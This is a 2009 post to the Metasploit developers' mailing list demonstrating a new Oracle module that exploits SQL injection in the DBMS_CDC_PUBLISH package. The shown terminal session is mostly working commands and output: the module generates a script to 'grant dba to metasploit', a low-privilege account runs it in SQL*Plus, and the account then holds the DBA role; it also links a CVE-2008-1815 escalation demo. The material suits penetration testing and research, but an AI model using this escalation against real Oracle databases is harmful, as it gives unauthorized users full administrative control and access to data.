we've slowly been adding oracle support to the metasploit framework.
the following is an example of how you can use current modules
exploiting sql injection vulnerabilities in various packages/procedures
using the sqlplus client.
* demo *
fueng:msf-dev mc$ ./msfcli auxiliary/admin/oracle/dbms_cdc_publish
SQL="grant dba to metasploit" E
[*] Creating 'msf.sql' file ...
[*] File 'msf.sql' is located in './data/exploits/' ...
fueng:msf-dev mc$ cd instantclient_10_2/
fueng:instantclient_10_2 mc$ ./sqlplus
metasploit/metaspl...@172.10.1.109/orcl
SQL*Plus: Release 10.2.0.4.0 - Production on Wed Feb 18 18:27:54 2009
Copyright (c) 1982, 2007, Oracle. All Rights Reserved.
Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Production
With the Partitioning, OLAP and Data Mining options
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
METASPLOIT CONNECT NO YES NO
SQL> @../data/exploits/msf.sql
DECLARE
*
ERROR at line 1:
ORA-01400: cannot insert NULL into ("SYS"."DBMS_LOCK_ALLOCATED"."NAME")
ORA-06512: at "SYS.DBMS_CDC_UTILITY", line 436
ORA-06512: at line 1
ORA-06512: at "SYS.DBMS_CDC_PUBLISH", line 535
ORA-06512: at line 1
ORA-06512: at line 8
Function dropped.
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
METASPLOIT CONNECT NO YES NO
METASPLOIT DBA NO YES NO
* *
in the near future, the addtion of a mixin using
ruby-dbi/ruby-oci8/oracle-instant-client will be added.
a demo of this can be seen here:
http://www.w00t-shell.net/demos/CVE-2008-1815-escalate.html
--
~ mc
_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers
